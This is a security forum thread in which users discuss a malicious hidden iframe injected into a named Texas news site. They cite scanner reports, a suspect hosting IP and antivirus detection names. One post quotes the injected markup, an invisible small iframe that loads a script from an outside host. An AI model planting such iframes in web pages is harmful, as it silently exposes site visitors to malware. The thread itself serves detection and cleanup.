Again the marvelous avast! Web Shield detects...

[polonus]

It blocks and detects: JS:Iframe-DOI[Trj] here for this site: htxp://quttera.com/detailed_report/frontporchnewstexas.com
See: https://www.virustotal.com/nl/url/616bb3978b0fd51d23dd2abe8b9c6e678fccb4e92bcc5c0281dc513a81a4b5d7/analysis/
and http://urlquery.net/report.php?id=8358034  with a snort IDS alert Snort Alert [1:27242:2]

IP bad web host-> https://www.virustotal.com/nl/ip-address/97.74.215.194/information/
iFrame check:
Suspicious <iframe src="htxp://rmai.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10"
and Injection Check:
Suspicious Text after HTML <iframe src="htxp://rmai.in/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
as detected MW:IFRAME:ENC1560 malware  -> blacklisted http://www.yandex.com/infected?url=frontporchnewstexas.com&l10n=en

Also consider the Sucuri report for this site: http://sitecheck.sucuri.net/results/frontporchnewstexas.com/december1950121111.htm
See: http://jsunpack.jeek.org/?report=90cad0c17bf04a4bbae2dc9ce948cd00bc980e4f -> The requested URL /counter.php was not found on this server.

More unknown google malware on IP: 97.74.215.194 -> http://support.clean-mx.de/clean-mx/viruses.php?sort=firstseen%20desc&review=97.74.215.194

pol

[Secondmineboy]

New scan: https://www.virustotal.com/de/url/616bb3978b0fd51d23dd2abe8b9c6e678fccb4e92bcc5c0281dc513a81a4b5d7/analysis/1386890616/
6 out of 51 detect it now.

[polonus]

Hi Steven Winderlich,

Thanks for checking, but click through and the overall situation is better still, 18 now to flag the scan results: https://www.virustotal.com/nl/file/3861d5fe92fce0d1760eb7c11599a1d0284417913c19d549e6b174ef4a8e9479/analysis/1386552730/
and avast! as HTML:Iframe-ZG [Trj]
But web shield detection is to be preferred as it detects and blocks, so the old OS and the browser never connected out and do not even have a chance to contact the malcode at hand. But to be sure, I always perform a full scan of the browser cache etc. in the aftermath for "flag remainders of encountering malcode" even when run in a VM or sandbox. Just to be absolutely sure sure 

Damian

[Secondmineboy]

That scan is 4 days old, can you make a fresh one?

Its funny that Kaspersky displays a message that a phishing link in IE can be used
to steal personal information, AND IT DETECTS THE SCRIPT MALWARE, but its not blocked completely.

[polonus]

Read here: http://webcache.googleusercontent.com/search?q=cache:8gu23oEUsKQJ:www.viruss.eu/virus-alert/malware-entry-mwiframeenc1560/+&cd=1&hl=nl&ct=clnk&gl=nl
Right as it says:  N.B.

that every PHP, HTML and JS file gets compromised by this malware

quote from above link - source av robot
This info underlines your comment!

polonus